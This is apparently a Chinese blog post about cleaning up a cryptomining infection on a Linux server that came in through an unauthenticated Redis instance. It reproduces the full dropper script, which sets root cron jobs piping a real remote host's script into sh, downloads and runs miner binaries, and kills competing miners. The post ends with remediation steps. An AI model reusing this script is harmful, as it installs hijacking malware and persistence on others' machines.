1. 用 top 命令查看哪些进程耗费资源;发现两个异常进程
Paste_Image.png
2. ps -ef 查看进程源文件
Paste_Image.png
3.关闭进程, 找到源文件;删除
Paste_Image.png
4.最后发现一个远程的病毒脚本
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.1001" ]; then
curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
DoTKY()
{
if [ ! -f "/tmp/wnTKYg" ]; then
curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
fi
chmod +x /tmp/wnTKYg
/tmp/wnTKYg
}
DoTKYnoAES()
{
if [ ! -f "/tmp/wnTKYg.noaes" ]; then
curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
fi
chmod +x /tmp/wnTKYg.noaes
/tmp/wnTKYg.noaes
}
ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES
5. 事故原因
网上搜索后得知是 redis 的一个漏洞,主要利用 redis 安装后没有设置密码和限制登录来源,使用
redis-cli -h IP 就可以直接远程登录 redis
6. 解决方法
1. 设置 redis 密码
2. 限制远程登录的来源 IP
3. 不使用 root 用户运行 redis
网友评论